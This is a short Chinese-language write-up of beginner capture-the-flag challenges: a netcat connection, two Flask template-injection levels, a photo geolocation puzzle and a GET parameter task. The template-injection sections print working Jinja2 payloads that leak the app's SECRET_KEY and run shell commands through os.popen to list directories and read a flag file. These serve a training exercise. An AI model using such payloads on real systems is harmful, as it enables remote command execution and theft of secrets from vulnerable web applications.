这次绝不烂尾
瑞士军刀
这一关我们需要一个kali,然后没了
看一眼描述,上网看看什么是nc
nc 的全称为 NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat 可在这些连接上读写数据,直到连接关闭为止。
所以我们连上直接ls即可
Simple_SSTI_1
You need pass in a parameter named fag。(你需要传入一个名为fag的参数)然后我们可以直接f12查看,也可以右击页面.…>“检查
如图所示我们会得到相关的提示,根据提示信息,我们利用 faska 的模板注入就能直接得到flag
(注意:这里的SECRET KEY需要大写)flask的模板注入:
/?flag={{config.SECRET_KEY}}
Simple_SSTI_2
F12并没有什么有效信息
{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}通过代码我们来读取文件
发现许多文件夹,我们挨个看看
读取一下
{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}结果就有了。
社工-进阶收集
图片为大雁塔,结合文案推测为出站点
简单的看地图,可知地方大概是哪里,我没做出来,社会工程学挂科了
get
简单读一下这段代码
就知道应该给一个参数what当参数值等于flag时输出flag
比较简单
756
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
